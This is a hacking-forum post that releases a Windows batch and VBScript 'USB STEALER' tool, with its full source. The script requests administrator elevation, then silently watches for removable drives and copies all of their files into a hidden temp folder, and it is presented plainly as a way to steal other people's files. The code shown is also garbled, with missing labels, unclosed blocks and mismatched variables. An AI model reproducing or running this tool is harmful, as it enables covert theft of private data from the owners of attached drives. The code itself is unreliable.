USB STEALER || Steal files with ease || Native Shell Code

Go down

USB STEALER || Steal files with ease || Native Shell Code

Post by Admin on Sat Mar 11, 2017 8:20 pm

Welcome. Today I am releasing a small script I've been working on. It's purpose is to continuously scan for USB's that are on/or will get attached to your machine, and rip their files. This script is capable of copying as many USB's as your machine allows you to run. Keep in mind, this is in a beta stage, so it is a bit buggy. Hopefully I will get the minor bugs fixed within a few days. Regardless, they will be listed on this thread.

Program Details:

  • UAC Invoke upon execution
  • Downloads all files, directories, and sub-directories quietly
  • Native all Batch source w/ VBScript implementation
  • Optional drive dump labeling function
  • Total file size of 2.93 Kilobytes

Known Bugs:
Only one, real known bug:
When inserting a USB, your machine will assign it the next available drive letter. After removing the drive, and inserting another one, it will most likely have the same letter as the first. Your machine will only assign a new label if a second or more drive(s) are inserted after the first. This leaves room for error when copying files since the drive dump folder is already named with the same label. Hence why I included the time labeling function.
-If you happen to find one, please report it to me-

@echo off >Nul
setlocal EnableDelayedExpansion
>nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system"
if '%errorlevel%' NEQ '0' (
    echo Requesting Elevation.
    goto UACPrompt
) else ( goto gotAdmin )

    echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%\getadmin.vbs"
    set params = %*:"=""
    echo UAC.ShellExecute "cmd.exe", "/c %~s0 %params%", "", "runas", 1 >> "%temp%\getadmin.vbs"

    del "%temp%\getadmin.vbs"
    exit /B

@REM  ************************************************************************\
@REM  *                        <|>   E. U. F. S.   <|>                        *
@REM  *                                  -#-                                  *
@REM  *                         Easy USB File Stealer                         *
@REM  *                            -#- Author: -#-                            *
@REM  *                           Ventriloquism@HF:                           *
@REM  *                           -=-=-=-=-=-=-=-=-                           *
@REM  *                      Ardebit, Devorabit, Solvite                      *
@REM  *                  [ Hackforums Batch Community 2016 ]                  *
@REM  \************************************************************************
Title [:: USB STEALER ::] && Color 07
If not exist "%temp%\DriveManage" ( goto :gen
) ELSE (
   goto :scan_4drive

Mkdir "%temp%\DriveManage"
Set "home=%temp%\DriveManage"
Set "scanzone=1800"

REM [Check all drives for USB(s) connected to the current system]
wmic logicaldisk get caption,description,filesystem | Find "Removable" >%home%\drive_list.ini

REM [Analyze drive list]
Set "cmd=findstr /R /N "^^" %home%\drive_list.ini | find /C ":""
For /f %%w in ('!cmd!') do set num=%%w

REM [If Drive(s) are found, proceed, else repeat loop]
If %num% == 0 (
Del /F /Q "%home%\drive_list.ini"
goto :scan_4drive
) ELSE (
goto :proceed

REM [Create a dump folder]
If not exist "%temp%\DriveManage\Collected" (
Mkdir "%temp%\DriveManage\Collected"

REM [Trim out unnecessary text from list]
set "file=%home%\drive_list.ini"
For /f "delims=" %%a in (%file%) do (
  set "var=%%a"
  echo !var:~0,2! >>%home%\USB.ini
Del /Q %file%

REM [Optional Time Label Sub for Copying]
:: set "hour=%time%"
:: set "minute=%time%"
:: set "label=%hour:~0,2%-%minute:~3,2%"

REM [Parse text data into command string]
REM [Attempt to rip all USB files]
Set "target=%home%\USB.ini"
for /f "delims=" %%q in (%target%) do (
Set "name=%%q"
Mkdir "%home%\Collected\USB [!name:~0,1!]"
xcopy /Y /E /R /C %%q "%home%\Collected\USB [!name:~0,1!]"

REM [Removes scan logs & restarts the scan]
Del /F /Q %home%\USB.ini

REM [Wait X-amount of Minutes Before Re-Scanning]
REM [Default: 00:05:00 (5 Minutes)]
Set "scanone=300"
Timeout /T %scanzone% /nobreak >Nul
goto :scan_4drive


Posts : 23
Join date : 2017-03-11

View user profile

Back to top Go down

Back to top

- Similar topics

Permissions in this forum:
You cannot reply to topics in this forum